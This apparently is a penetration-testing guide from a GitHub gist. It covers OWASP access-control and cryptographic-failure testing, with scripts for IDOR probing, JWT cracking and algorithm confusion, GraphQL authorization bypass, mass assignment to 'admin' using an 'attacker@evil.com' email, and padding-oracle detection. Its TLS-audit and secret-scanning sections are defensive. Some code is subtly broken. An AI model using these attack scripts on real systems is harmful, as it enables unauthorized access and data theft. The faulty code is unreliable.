Skip to content

Instantly share code, notes, and snippets.

@aw-junaid
Created January 31, 2026 12:23
Show Gist options
  • Select an option

  • Save aw-junaid/9c22f9b8030a158c3937ed9c666b08be to your computer and use it in GitHub Desktop.

Select an option

Save aw-junaid/9c22f9b8030a158c3937ed9c666b08be to your computer and use it in GitHub Desktop.
The OWASP Top 10 represents the most critical web application security risks, but defending against them requires understanding the attacker's toolkit. This comprehensive guide details professional-grade tools, advanced techniques, and operational procedures for testing each vulnerability category. We'll cover everything from basic reconnaissanc…

OWASP Top 10 Vulnerabilities: The Ultimate Toolkit Guide

Comprehensive Encyclopedia of Offensive Security Tools, Techniques, and Procedures

Introduction: The Modern AppSec Arsenal

The OWASP Top 10 represents the most critical web application security risks, but defending against them requires understanding the attacker's toolkit. This comprehensive guide details professional-grade tools, advanced techniques, and operational procedures for testing each vulnerability category. We'll cover everything from basic reconnaissance to sophisticated exploitation chains, emphasizing authorized testing methodologies and real-world workflows.

Legal & Ethical Disclaimer: All tools and techniques described herein must be used only on systems you own or have explicit written authorization to test. Unauthorized testing is illegal and unethical. Always establish clear rules of engagement and scope before any security assessment.


Chapter 1: Broken Access Control - The Gatekeeper's Failure

1.1 Deep Dive: Understanding Access Control Models

Access control failures occur when applications fail to properly enforce authorization policies, allowing users to perform actions outside their intended permissions. Modern applications implement several models:

Discretionary Access Control (DAC): Resource owners control access (UNIX file permissions) Mandatory Access Control (MAC): System-enforced policies (SELinux, AppArmor) Role-Based Access Control (RBAC): Permissions assigned to roles Attribute-Based Access Control (ABAC): Policies based on user/resource attributes

1.2 Professional Tooling Ecosystem

Burp Suite Enterprise-Grade Configuration

# Advanced Burp configuration for access control testing
java -jar burpsuite_pro.jar --project-file=project.burp --config-file=burp.cfg

# Burp configuration file (burp.cfg):
burp {
  suite {
    # Increase memory for large applications
    vmargs = "-Xmx8G -XX:+UseG1GC -XX:MaxGCPauseMillis=200"
  }
  proxy {
    # Configure upstream proxy for corporate environments
    upstream_proxy = "proxy.corp.com:8080"
    # SSL interception
    ssl {
      certificate_export = "/certs/"
      client_certificates = "/certs/client.p12"
    }
  }
  scanner {
    # Custom scan configurations
    audit_depth = 10
    audit_items = ["access_control", "idor"]
  }
}

# Export project data for team collaboration
java -jar burpsuite_pro.jar --export-project --format=json --output=project_export.json

OWASP ZAP Advanced Automation

# ZAP Docker deployment for CI/CD integration
docker run -v $(pwd):/zap/wrk -t owasp/zap2docker-stable zap-baseline.py \
  -t https://target.com \
  -g gen.conf \
  -r report.html \
  -J report.json \
  -w report.md

# ZAP automation script (zap_script.js)
var HttpSender = Java.type('org.parosproxy.paros.network.HttpSender')
var ScriptVars = Java.type('org.zaproxy.zap.extension.script.ScriptVars')

function sendingRequest(msg, initiator, helper) {
  // Add custom headers for all requests
  msg.getRequestHeader().setHeader("X-Test-ID", "ACCESS-CTRL-2024")
  
  // Modify session tokens for testing
  if (msg.getRequestHeader().getURI().toString().contains("/api/")) {
    var cookies = msg.getRequestHeader().getHeader("Cookie")
    if (cookies && cookies.includes("session=")) {
      // Test with other users' session tokens
      var newCookies = cookies.replace(/session=[^;]+/, "session=ATTACKER_SESSION_TOKEN")
      msg.getRequestHeader().setHeader("Cookie", newCookies)
    }
  }
}

# ZAP API automation with Python
import zapv2
import time

zap = zapv2.ZAPv2(apikey='your-api-key', proxies={'http': 'http://127.0.0.1:8080'})

# Spider with advanced configuration
zap.spider.set_option_max_depth(5)
zap.spider.set_option_thread_count(5)
scan_id = zap.spider.scan('https://target.com')

# Active scan with custom policies
scan_policy = {
  'attackStrength': 'HIGH',
  'alertThreshold': 'MEDIUM',
  'scannerId': [40000, 40001]  # Access control and IDOR scanners
}
zap.ascan.enable_scanners(scan_policy)

1.3 Advanced IDOR (Insecure Direct Object Reference) Techniques

Parameter Analysis with Custom Tooling

#!/usr/bin/env python3
"""
Advanced IDOR detector with pattern recognition
Detects sequential/numeric UUIDs, predictable patterns
"""
import re
import requests
from urllib.parse import urlparse, parse_qs
from collections import Counter
import json
import hashlib

class IDORDetector:
    def __init__(self, target_url, session_cookies=None):
        self.target = target_url
        self.session = requests.Session()
        if session_cookies:
            self.session.cookies.update(session_cookies)
        self.param_patterns = {
            'numeric': r'\b\d{1,10}\b',
            'uuid': r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
            'base64': r'[A-Za-z0-9+/=]{20,}',
            'hex': r'[0-9a-fA-F]{16,}',
            'date': r'\d{4}-\d{2}-\d{2}'
        }
    
    def analyze_parameters(self, url):
        """Extract and classify parameters"""
        parsed = urlparse(url)
        params = parse_qs(parsed.query)
        
        param_types = {}
        for param, values in params.items():
            for value in values:
                param_types[param] = self.classify_value(value)
        
        return param_types
    
    def classify_value(self, value):
        """Classify parameter values"""
        for ptype, pattern in self.param_patterns.items():
            if re.match(pattern, value, re.IGNORECASE):
                return ptype
        return 'unknown'
    
    def generate_test_values(self, param_type, original_value):
        """Generate test values based on parameter type"""
        tests = []
        
        if param_type == 'numeric':
            base = int(original_value)
            tests = [
                str(base - 1), str(base + 1),
                str(base * 2), str(base // 2),
                '0', '-1', '999999999'
            ]
        elif param_type == 'uuid':
            # Generate similar UUIDs
            import uuid
            tests = [str(uuid.uuid4()) for _ in range(5)]
        
        return tests
    
    def test_idor(self, url, sensitive_keywords=None):
        """Test for IDOR vulnerabilities"""
        results = []
        param_types = self.analyze_parameters(url)
        
        for param, ptype in param_types.items():
            test_values = self.generate_test_values(ptype, original_value)
            
            for test_val in test_values:
                # Modify URL with test value
                test_url = self.modify_param(url, param, test_val)
                
                try:
                    response = self.session.get(test_url, timeout=10)
                    
                    # Analyze response for sensitive data
                    if self.is_sensitive_response(response, sensitive_keywords):
                        results.append({
                            'parameter': param,
                            'original_value': original_value,
                            'test_value': test_val,
                            'status_code': response.status_code,
                            'response_length': len(response.text),
                            'indicators': self.extract_indicators(response.text)
                        })
                
                except Exception as e:
                    continue
        
        return results

# Usage
detector = IDORDetector('https://api.target.com/user/123/profile')
results = detector.test_idor(['SSN', 'credit_card', 'password'])

JWT Advanced Manipulation Toolkit

# JWT Toolkit (jwt_tool) advanced usage
# Install: git clone https://github.com/ticarpi/jwt_tool

# Comprehensive JWT attack
python3 jwt_tool.py eyJ0eXAiOiJKV1Qi... \
  -M at \                    # All tests
  -X a \                    # Algorithm confusion
  -k public.pem \           # Public key for confusion
  -d /usr/share/wordlists/rockyou.txt \  # Dictionary attack
  -t http://target.com/api/user \        # Target for verification
  -cv "email" \             # Claim to verify
  -rh "Authorization: Bearer {token}" \  # Request header format
  -S \                      # Generate SQLi payloads in claims
  -pc "user_id" \           # Target claim for manipulation
  -pv "admin" \             # Value to inject
  -T \                      # Tamper mode
  -out crafted_jwt.txt      # Output crafted tokens

# JWT crack with hashcat
# First convert JWT to hashcat format
echo -n "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9" > header.txt
echo -n "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ" > payload.txt

# For HS256
hashcat -m 16500 jwt.hash wordlist.txt -O -w 4

# For RS256 public key extraction and misuse
python3 jwt_tool.py eyJ0eXAi... -X k -pk public_key.pem -pc payload_claim

# JWT automatic scanner integration
python3 jwt_automate.py \
  --target http://target.com \
  --wordlist jwt_secrets.txt \
  --threads 10 \
  --output results.json \
  --verify-endpoint /api/verify \
  --valid-keyword "success"

1.4 GraphQL Authorization Testing

#!/usr/bin/env python3
"""
GraphQL authorization bypass tester
Tests for inadequate field-level permissions
"""
import requests
import json
import sys
from graphql import build_ast_schema, parse
from graphql.utilities import get_operation_ast

class GraphQLAuthTester:
    def __init__(self, endpoint, headers=None):
        self.endpoint = endpoint
        self.headers = headers or {'Content-Type': 'application/json'}
        self.introspection_query = """
        query IntrospectionQuery {
          __schema {
            queryType { name }
            mutationType { name }
            subscriptionType { name }
            types {
              ...FullType
            }
            directives {
              name
              description
              locations
              args {
                ...InputValue
              }
            }
          }
        }
        fragment FullType on __Type {
          kind
          name
          description
          fields(includeDeprecated: true) {
            name
            description
            args {
              ...InputValue
            }
            type {
              ...TypeRef
            }
            isDeprecated
            deprecationReason
          }
          inputFields {
            ...InputValue
          }
          interfaces {
            ...TypeRef
          }
          enumValues(includeDeprecated: true) {
            name
            description
            isDeprecated
            deprecationReason
          }
          possibleTypes {
            ...TypeRef
          }
        }
        fragment InputValue on __InputValue {
          name
          description
          type { ...TypeRef }
          defaultValue
        }
        fragment TypeRef on __Type {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
                ofType {
                  kind
                  name
                }
              }
            }
          }
        }
        """
    
    def get_introspection(self):
        """Fetch GraphQL schema via introspection"""
        response = requests.post(
            self.endpoint,
            json={'query': self.introspection_query},
            headers=self.headers
        )
        return response.json()
    
    def extract_sensitive_fields(self, schema):
        """Identify potentially sensitive fields"""
        sensitive_keywords = [
            'password', 'email', 'ssn', 'credit', 'card',
            'admin', 'role', 'permission', 'token', 'secret',
            'salary', 'address', 'phone', 'birth'
        ]
        
        sensitive_fields = []
        for type_def in schema.get('data', {}).get('__schema', {}).get('types', []):
            if type_def.get('fields'):
                for field in type_def['fields']:
                    field_name = field.get('name', '').lower()
                    if any(keyword in field_name for keyword in sensitive_keywords):
                        sensitive_fields.append({
                            'type': type_def['name'],
                            'field': field['name'],
                            'description': field.get('description', '')
                        })
        
        return sensitive_fields
    
    def test_field_level_access(self, query_template, user_tokens):
        """Test if different users can access same fields"""
        results = []
        
        for token_name, token_value in user_tokens.items():
            headers = self.headers.copy()
            headers['Authorization'] = f'Bearer {token_value}'
            
            response = requests.post(
                self.endpoint,
                json={'query': query_template},
                headers=headers
            )
            
            if response.status_code == 200:
                data = response.json()
                # Check if sensitive data is present
                if self.contains_sensitive_data(data):
                    results.append({
                        'user': token_name,
                        'has_access': True,
                        'data_exposed': self.extract_sensitive_values(data)
                    })
        
        return results

# Usage
tester = GraphQLAuthTester('https://target.com/graphql')
schema = tester.get_introspection()
sensitive_fields = tester.extract_sensitive_fields(schema)

1.5 Advanced Testing Techniques

Horizontal Privilege Escalation

# Automated horizontal privilege escalation testing
#!/bin/bash

# Test user A accessing user B's resources
USER_A_TOKEN="eyJ0eXAi..."
USER_B_ID="456"

# Test endpoints with User A's token accessing User B's data
ENDPOINTS=(
  "/api/users/${USER_B_ID}/profile"
  "/api/orders?user_id=${USER_B_ID}"
  "/api/documents/${USER_B_ID}/files"
  "/api/messages/${USER_B_ID}"
)

for endpoint in "${ENDPOINTS[@]}"; do
  echo "Testing: $endpoint"
  curl -s -H "Authorization: Bearer $USER_A_TOKEN" \
    "https://target.com$endpoint" \
    | jq '. | select(.error == null)' \
    && echo "VULNERABLE: User A can access $endpoint"
  sleep 1
done

# Mass assignment testing with different user contexts
cat > mass_assignment_test.py << 'EOF'
import requests
import json

def test_mass_assignment(target_url, token_a, token_b):
    """Test if user can modify other users' attributes"""
    
    # First get user B's data with admin token
    headers_a = {'Authorization': f'Bearer {token_a}'}
    user_b_data = requests.get(f'{target_url}/api/users/456', headers=headers_a).json()
    
    # Try to modify with user A's token (lower privilege)
    headers_b = {'Authorization': f'Bearer {token_b}'}
    
    # Attempt to change sensitive fields
    payload = {
        'email': 'attacker@evil.com',
        'role': 'admin',
        'is_active': True,
        'permissions': ['read', 'write', 'delete']
    }
    
    # Merge with existing data
    attack_payload = {**user_b_data, **payload}
    
    response = requests.put(
        f'{target_url}/api/users/456',
        json=attack_payload,
        headers=headers_b
    )
    
    return response.status_code == 200
EOF

Batch Request Testing

# Batch request IDOR testing
import requests
import json

def test_batch_idor(target_url, session_token):
    """Test for IDOR in batch endpoints"""
    
    headers = {
        'Authorization': f'Bearer {session_token}',
        'Content-Type': 'application/json'
    }
    
    # Craft batch request with mixed user IDs
    batch_payload = {
        "requests": [
            {"method": "GET", "path": "/api/users/123/profile"},
            {"method": "GET", "path": "/api/users/456/profile"},  # Other user
            {"method": "GET", "path": "/api/users/789/profile"},
            {"method": "POST", "path": "/api/users/456/update", "body": {"role": "admin"}}
        ]
    }
    
    response = requests.post(
        f"{target_url}/api/batch",
        json=batch_payload,
        headers=headers
    )
    
    if response.status_code == 200:
        responses = response.json().get('responses', [])
        for i, resp in enumerate(responses):
            if resp.get('status') == 200:
                print(f"Batch request {i} succeeded - potential IDOR")
                print(f"Response: {resp.get('body', '')[:200]}")

# Test GraphQL batching for IDOR
graphql_batch = """
[
  {"query": "query { user(id: 123) { email privateData } }"},
  {"query": "query { user(id: 456) { email privateData } }"},
  {"query": "mutation { updateUser(id: 456, input: {role: \"admin\"}) { id } }"}
]
"""

Chapter 2: Cryptographic Failures - Beyond SSL/TLS

2.1 Advanced TLS/SSL Analysis

Comprehensive SSL Audit Framework

#!/bin/bash
# Advanced TLS scanner with detailed reporting

TARGET="example.com"
OUTPUT_DIR="./tls_audit_$(date +%Y%m%d_%H%M%S)"
mkdir -p $OUTPUT_DIR

echo "[*] Starting comprehensive TLS audit for $TARGET"

# 1. SSL Labs-style comprehensive test
echo "[*] Running testssl.sh full audit"
./testssl.sh --openssl-timeout 5 --warnings batch --color 0 \
  --htmlfile $OUTPUT_DIR/testssl_full.html \
  --jsonfile $OUTPUT_DIR/testssl_full.json \
  $TARGET

# 2. Cipher suite enumeration with grading
echo "[*] Enumerating cipher suites with SSLScan"
sslscan --no-failed --no-renegotiation --no-compression \
  --no-heartbleed --no-renegotiation --no-fallback \
  --xml=$OUTPUT_DIR/sslscan.xml $TARGET

# 3. TLS version support with compatibility matrix
echo "[*] Testing TLS version support"
for version in ssl2 ssl3 tls1 tls1_1 tls1_2 tls1_3; do
  echo "Testing $version..."
  openssl s_client -connect $TARGET:443 \
    -$version < /dev/null 2>&1 | grep -E "Protocol|Cipher|Secure Renegotiation" \
    > $OUTPUT_DIR/tls_$version.txt
done

# 4. Certificate transparency log checking
echo "[*] Checking certificate transparency logs"
curl -s "https://crt.sh/?q=%.$TARGET&output=json" | jq . > $OUTPUT_DIR/cert_transparency.json

# 5. OCSP stapling check
echo "[*] Testing OCSP stapling"
openssl s_client -connect $TARGET:443 -status < /dev/null 2>&1 \
  | grep -A 17 "OCSP response" > $OUTPUT_DIR/ocsp_response.txt

# 6. Certificate chain validation
echo "[*] Validating certificate chain"
openssl s_client -showcerts -connect $TARGET:443 < /dev/null 2>&1 \
  | awk '/BEGIN CERT/,/END CERT/ {print $0}' \
  > $OUTPUT_DIR/certificate_chain.pem

# Analyze each certificate in chain
openssl x509 -in $OUTPUT_DIR/certificate_chain.pem -text -noout \
  | grep -E "Subject:|Issuer:|Not Before:|Not After :|Signature Algorithm:|Public Key Algorithm:" \
  > $OUTPUT_DIR/certificate_details.txt

# 7. Check for weak signature algorithms
echo "[*] Checking for weak signature algorithms"
openssl s_client -connect $TARGET:443 < /dev/null 2>&1 \
  | openssl x509 -text -noout | grep "Signature Algorithm" \
  | grep -E "sha1|md5" && echo "WEAK SIGNATURE ALGORITHM DETECTED"

# 8. Check for mixed content issues
echo "[*] Checking for mixed content"
curl -s https://$TARGET | grep -i "http://" | grep -v "http://$TARGET" \
  > $OUTPUT_DIR/mixed_content.txt

# 9. HSTS preload status
echo "[*] Checking HSTS configuration"
curl -sI https://$TARGET | grep -i strict-transport-security \
  > $OUTPUT_DIR/hsts_headers.txt

# 10. Generate comprehensive report
cat > $OUTPUT_DIR/report.md << EOF
# TLS/SSL Security Audit Report
## Target: $TARGET
## Date: $(date)

## Executive Summary
$(./testssl.sh $TARGET --color 0 | grep -A 5 "Overall rating")

## Detailed Findings
### Certificate Information
$(cat $OUTPUT_DIR/certificate_details.txt)

### Vulnerabilities Found
$(grep -i "vulnerable\|weak\|not offered" $OUTPUT_DIR/testssl_full.html | head -20)

### Recommendations
1. Disable weak cipher suites
2. Enable TLS 1.3
3. Implement proper HSTS headers
4. Ensure certificate transparency logging
EOF

echo "[+] Audit complete. Reports saved to $OUTPUT_DIR"

TLS Fingerprinting and Implementation Detection

#!/usr/bin/env python3
"""
Advanced TLS fingerprinting tool
Identifies specific implementations (OpenSSL, NSS, Schannel, etc.)
"""
import socket
import ssl
import json
from dataclasses import dataclass
from typing import Dict, List
import hashlib

@dataclass
class TLSFingerprint:
    target: str
    port: int = 443
    timeout: int = 5
    
    def get_tls_fingerprint(self):
        """Collect TLS handshake characteristics"""
        fingerprint = {}
        
        # Test different TLS versions
        tls_versions = [
            (ssl.PROTOCOL_TLSv1, "TLSv1"),
            (ssl.PROTOCOL_TLSv1_1, "TLSv1.1"),
            (ssl.PROTOCOL_TLSv1_2, "TLSv1.2"),
            (ssl.PROTOCOL_TLS, "TLS")  # Highest supported
        ]
        
        for proto, name in tls_versions:
            try:
                context = ssl.SSLContext(proto)
                context.set_ciphers('ALL:COMPLEMENTOFALL')
                
                with socket.create_connection((self.target, self.port), self.timeout) as sock:
                    with context.wrap_socket(sock, server_hostname=self.target) as ssock:
                        cipher = ssock.cipher()
                        cert = ssock.getpeercert(binary_form=True)
                        
                        fingerprint[name] = {
                            'cipher_suite': cipher[0],
                            'protocol_version': cipher[1],
                            'key_length': cipher[2],
                            'certificate_sha256': hashlib.sha256(cert).hexdigest() if cert else None,
                            'session_id': ssock.session.id if ssock.session else None,
                            'session_reused': ssock.session_reused,
                            'compression': ssock.compression()
                        }
            except Exception as e:
                fingerprint[name] = {'error': str(e)}
        
        # Get all supported ciphers
        fingerprint['supported_ciphers'] = self.get_supported_ciphers()
        
        return fingerprint
    
    def get_supported_ciphers(self):
        """Test all possible cipher suites"""
        ciphers = []
        cipher_list = [
            'ECDHE-RSA-AES256-GCM-SHA384',
            'ECDHE-ECDSA-AES256-GCM-SHA384',
            'ECDHE-RSA-AES256-SHA384',
            'ECDHE-ECDSA-AES256-SHA384',
            'ECDHE-RSA-AES256-SHA',
            'ECDHE-ECDSA-AES256-SHA',
            'SRP-DSS-AES-256-CBC-SHA',
            'SRP-RSA-AES-256-CBC-SHA',
            # ... extensive cipher list
        ]
        
        for cipher in cipher_list:
            try:
                context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
                context.set_ciphers(cipher)
                
                with socket.create_connection((self.target, self.port), self.timeout) as sock:
                    with context.wrap_socket(sock, server_hostname=self.target) as ssock:
                        if ssock.cipher()[0] == cipher:
                            ciphers.append(cipher)
            except:
                continue
        
        return ciphers
    
    def identify_implementation(self, fingerprint):
        """Identify TLS implementation based on fingerprint"""
        implementations = {
            'OpenSSL': {
                'characteristics': ['supports_tls_fallback_scsv', 'session_ticket_ext'],
                'ciphers': ['ECDHE-RSA-AES256-GCM-SHA384', 'DHE-RSA-AES256-GCM-SHA384']
            },
            'NSS (Mozilla)': {
                'characteristics': ['supports_signed_cert_timestamps', 'ec_point_formats'],
                'ciphers': ['ECDHE-RSA-AES256-GCM-SHA384', 'ECDHE-ECDSA-AES256-GCM-SHA384']
            },
            'Schannel (Windows)': {
                'characteristics': ['tls_ext_ms', 'tls_ext_reneg'],
                'ciphers': ['TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384']
            },
            'BoringSSL (Google)': {
                'characteristics': ['google_pinning', 'tls_ext_signed_cert'],
                'ciphers': ['TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384']
            }
        }
        
        matches = []
        for impl, chars in implementations.items():
            score = 0
            # Check cipher suite matches
            for cipher in chars['ciphers']:
                if cipher in fingerprint.get('supported_ciphers', []):
                    score += 1
            
            # Check characteristic matches
            for char in chars['characteristics']:
                if char in str(fingerprint):
                    score += 2
            
            if score > 0:
                matches.append((impl, score))
        
        return sorted(matches, key=lambda x: x[1], reverse=True)

# Usage
fingerprinter = TLSFingerprint("example.com")
fingerprint = fingerprinter.get_tls_fingerprint()
implementations = fingerprinter.identify_implementation(fingerprint)

2.2 Cryptographic Implementation Flaws

Padding Oracle Attack Detection

#!/usr/bin/env python3
"""
Padding Oracle Attack Detector
Tests for vulnerable CBC mode implementations
"""
import requests
import time
from base64 import b64encode, b64decode
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad, unpad

class PaddingOracleDetector:
    def __init__(self, target_url, ciphertext_param='cipher'):
        self.target_url = target_url
        self.cipher_param = ciphertext_param
        self.block_size = 16  # AES block size
        
    def test_oracle(self, ciphertext):
        """Test if server behaves as a padding oracle"""
        test_cases = [
            # Valid ciphertext (should return 200)
            ciphertext,
            
            # Modified last byte (might cause padding error)
            self.modify_last_byte(ciphertext),
            
            # Completely random ciphertext
            self.generate_random_ciphertext(),
            
            # Short ciphertext
            ciphertext[:self.block_size * 2],
        ]
        
        responses = []
        for test_ct in test_cases:
            start_time = time.time()
            response = self.send_ciphertext(test_ct)
            elapsed = time.time() - start_time
            
            responses.append({
                'ciphertext': test_ct[:32] + '...',
                'status_code': response.status_code,
                'response_time': elapsed,
                'error_keywords': self.check_error_keywords(response.text),
                'content_length': len(response.content)
            })
        
        return responses
    
    def check_error_keywords(self, response_text):
        """Check for padding-related error messages"""
        padding_keywords = [
            'padding', 'decrypt', 'cipher', 'invalid',
            'PKCS', 'bad', 'error', 'exception',
            'malformed', 'encoding', 'cryptographic'
        ]
        
        found = []
        for keyword in padding_keywords:
            if keyword.lower() in response_text.lower():
                found.append(keyword)
        
        return found
    
    def automated_exploit_test(self):
        """Automated test for padding oracle vulnerability"""
        # Example: If application uses encrypted session cookies
        session_cookie = "ENCRYPTED_SESSION_VALUE"
        
        # Test timing attacks
        timing_differences = []
        for i in range(100):
            # Send valid request
            start = time.perf_counter()
            self.send_ciphertext(session_cookie)
            valid_time = time.perf_counter() - start
            
            # Send invalid padding
            invalid_ct = self.modify_last_byte(session_cookie)
            start = time.perf_counter()
            self.send_ciphertext(invalid_ct)
            invalid_time = time.perf_counter() - start
            
            timing_differences.append(invalid_time - valid_time)
        
        avg_timing_diff = sum(timing_differences) / len(timing_differences)
        
        # Check for significant timing difference
        if avg_timing_diff > 0.01:  # 10ms difference
            return {
                'vulnerable': True,
                'type': 'timing_based_padding_oracle',
                'average_timing_difference': avg_timing_diff
            }
        
        # Check for different error responses
        error_codes = set()
        for _ in range(20):
            random_ct = self.generate_random_ciphertext()
            response = self.send_ciphertext(random_ct)
            error_codes.add(response.status_code)
        
        if len(error_codes) > 1:
            return {
                'vulnerable': True,
                'type': 'error_based_padding_oracle',
                'different_error_codes': list(error_codes)
            }
        
        return {'vulnerable': False}

# Real-world example: ASP.NET Padding Oracle (MS10-070)
def test_aspnet_padding_oracle():
    """Test for classic ASP.NET padding oracle"""
    detector = PaddingOracleDetector("https://target.com/WebResource.axd")
    
    # ASP.NET specific tests
    test_vectors = [
        # Valid WebResource request
        "/WebResource.axd?d=VALID_ENCRYPTED_STRING",
        
        # Tampered request
        "/WebResource.axd?d=TAMPERED_ENCRYPTED_STRING",
        
        # Different error conditions
        "/WebResource.axd?d=" + "A" * 100,
        "/WebResource.axd",
    ]
    
    for vector in test_vectors:
        response = requests.get(f"https://target.com{vector}")
        
        # Check for padding-related errors
        if any(err in response.text for err in ['Padding', 'Cryptographic', 'Bad Data']):
            print(f"Potential padding oracle at {vector}")

Weak Randomness Detection

#!/usr/bin/env python3
"""
Cryptographic randomness analyzer
Tests for weak PRNG usage in session tokens, CSRF tokens, etc.
"""
import requests
import collections
import math
import statistics
from typing import List
import hashlib

class RandomnessAnalyzer:
    def __init__(self):
        self.entropy_threshold = 3.0  # Minimum entropy per byte
    
    def collect_samples(self, target_url, sample_count=1000):
        """Collect cryptographic tokens from target"""
        samples = []
        
        for _ in range(sample_count):
            try:
                # Get a page that generates tokens
                response = requests.get(target_url)
                
                # Extract potential tokens (adjust regex as needed)
                import re
                tokens = re.findall(r'[A-Za-z0-9+/=]{20,}', response.text)
                samples.extend(tokens[:5])  # Take first few tokens
                
            except Exception as e:
                print(f"Error collecting sample: {e}")
        
        return samples[:sample_count]
    
    def analyze_entropy(self, tokens: List[str]):
        """Calculate Shannon entropy of tokens"""
        results = []
        
        for token in tokens:
            # Calculate byte entropy
            if len(token) < 16:
                continue
            
            # Count byte frequencies
            byte_counts = collections.Counter(token.encode())
            total_bytes = len(token)
            
            # Calculate Shannon entropy
            entropy = 0.0
            for count in byte_counts.values():
                probability = count / total_bytes
                entropy -= probability * math.log2(probability)
            
            # Normalize to bits per byte
            entropy_per_byte = entropy
            
            results.append({
                'token': token[:20] + '...',
                'length': len(token),
                'entropy_per_byte': entropy_per_byte,
                'is_weak': entropy_per_byte < self.entropy_threshold
            })
        
        return results
    
    def test_for_bias(self, tokens: List[str]):
        """Test for statistical bias in tokens"""
        if not tokens:
            return None
        
        # Convert tokens to bytes and analyze patterns
        all_bytes = b''.join([t.encode() for t in tokens])
        
        # Chi-square test for uniform distribution
        byte_counts = [0] * 256
        for byte in all_bytes:
            byte_counts[byte] += 1
        
        total_bytes = len(all_bytes)
        expected = total_bytes / 256
        
        chi_square = sum((observed - expected) ** 2 / expected 
                        for observed in byte_counts)
        
        # Degrees of freedom = 255
        # Critical value for p=0.05 is ~293
        is_biased = chi_square > 293
        
        # Test for sequential patterns
        sequential_patterns = 0
        for i in range(len(all_bytes) - 1):
            if abs(all_bytes[i] - all_bytes[i + 1]) == 1:
                sequential_patterns += 1
        
        sequential_ratio = sequential_patterns / len(all_bytes)
        
        return {
            'chi_square': chi_square,
            'is_biased': is_biased,
            'sequential_patterns': sequential_patterns,
            'sequential_ratio': sequential_ratio,
            'total_bytes_analyzed': total_bytes
        }
    
    def detect_prng_type(self, tokens: List[str]):
        """Attempt to identify the PRNG algorithm used"""
        patterns = {
            'LCG': self.check_lcg_pattern,
            'MT19937': self.check_mersenne_twister,
            'Java_Random': self.check_java_random,
            'time_based': self.check_time_based
        }
        
        detected = []
        for name, checker in patterns.items():
            if checker(tokens):
                detected.append(name)
        
        return detected
    
    def check_time_based(self, tokens):
        """Check if tokens are based on timestamps"""
        import time
        current_time = int(time.time())
        
        # Check if tokens contain recent timestamps
        for token in tokens:
            try:
                # Common patterns: timestamp in hex, base64, or decimal
                decoded = token
                if len(decoded) >= 8:
                    # Try to extract timestamp
                    possible_ts = int(decoded[:8], 16) if all(c in '0123456789abcdefABCDEF' 
                                                             for c in decoded[:8]) else 0
                    
                    if abs(current_time - possible_ts) < 86400:  # Within 24 hours
                        return True
            except:
                continue
        
        return False

# Usage
analyzer = RandomnessAnalyzer()
samples = analyzer.collect_samples("https://target.com/login", 500)
entropy_results = analyzer.analyze_entropy(samples)
bias_results = analyzer.test_for_bias(samples)
prng_type = analyzer.detect_prng_type(samples)

2.3 Secret Management Failures

Advanced Secret Scanning

#!/bin/bash
# Comprehensive secret scanning across multiple sources

TARGET_DIR="/path/to/codebase"
OUTPUT_FILE="secrets_report_$(date +%Y%m%d).json"

echo "[*] Starting comprehensive secret scan..."

# 1. TruffleHog with all detectors
trufflehog filesystem $TARGET_DIR \
  --no-verification \
  --json | jq . > trufflehog_raw.json

# 2. Gitleaks with custom configuration
cat > .gitleaks.toml << 'EOF'
title = "gitleaks config"
[[rules]]
description = "AWS Access Key"
regex = '''(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'''
tags = ["key", "AWS"]

[[rules]]
description = "GitHub Token"
regex = '''gh[pousr]_[A-Za-z0-9_]{36,255}'''
tags = ["key", "GitHub"]

[[rules]]
description = "Generic API Key"
regex = '''(?i)(api[_-]?key|apikey|secret)[\s]*[=:][\s]*["']?[A-Za-z0-9]{16,64}["']?'''
tags = ["key", "API"]
EOF

gitleaks detect --source $TARGET_DIR \
  --config .gitleaks.toml \
  --report-format json \
  --report-path gitleaks_report.json

# 3. detect-secrets with baseline comparison
detect-secrets scan $TARGET_DIR \
  --all-files \
  --baseline .secrets.baseline

detect-secrets audit .secrets.baseline

# 4. Custom regex scanning for business-specific secrets
cat > custom_secrets.py << 'EOF'
import re
import os
import json

def scan_for_custom_secrets(directory):
    patterns = {
        "database_url": r"postgres(ql)?://[^:\s]+:[^@\s]+@[^\s]+",
        "jwt_secret": r"(?i)(jwt|access|refresh)[_-]?(secret|key)[\s]*[:=][\s]*['\"][A-Za-z0-9+/=]{32,}['\"]",
        "encryption_key": r"(?i)(encryption|aes|des|blowfish)[_-]?(key|iv)[\s]*[:=][\s]*['\"][A-Za-z0-9+/=]{16,}['\"]",
        "private_key": r"-----BEGIN (RSA|DSA|EC|OPENSSH) PRIVATE KEY-----",
        "oauth": r"[0-9a-f]{32}-[0-9a-f]{32}",
    }
    
    findings = []
    for root, dirs, files in os.walk(directory):
        for file in files:
            if file.endswith(('.py', '.js', '.java', '.php', '.rb', '.go', '.yml', '.yaml', '.json', '.env')):
                filepath = os.path.join(root, file)
                try:
                    with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                        content = f.read()
                        for secret_type, pattern in patterns.items():
                            matches = re.finditer(pattern, content, re.IGNORECASE)
                            for match in matches:
                                # Get context (2 lines before and after)
                                lines = content.split('\n')
                                line_no = content[:match.start()].count('\n') + 1
                                context_start = max(0, line_no - 3)
                                context_end = min(len(lines), line_no + 2)
                                context = '\n'.join(lines[context_start:context_end])
                                
                                findings.append({
                                    "file": filepath,
                                    "line": line_no,
                                    "secret_type": secret_type,
                                    "match": match.group()[:50] + "..." if len(match.group()) > 50 else match.group(),
                                    "context": context
                                })
                except Exception as e:
                    continue
    
    return findings
EOF

python3 custom_secrets.py > custom_findings.json

# 5. Historical secret scanning in git
git log -p | grep -E "(pass|secret|key|token|auth)" > git_history_secrets.txt

# 6. Combine all findings
jq -s 'add' trufflehog_raw.json gitleaks_report.json custom_findings.json > $OUTPUT_FILE

echo "[+] Secret scanning complete. Report saved to $OUTPUT_FILE"

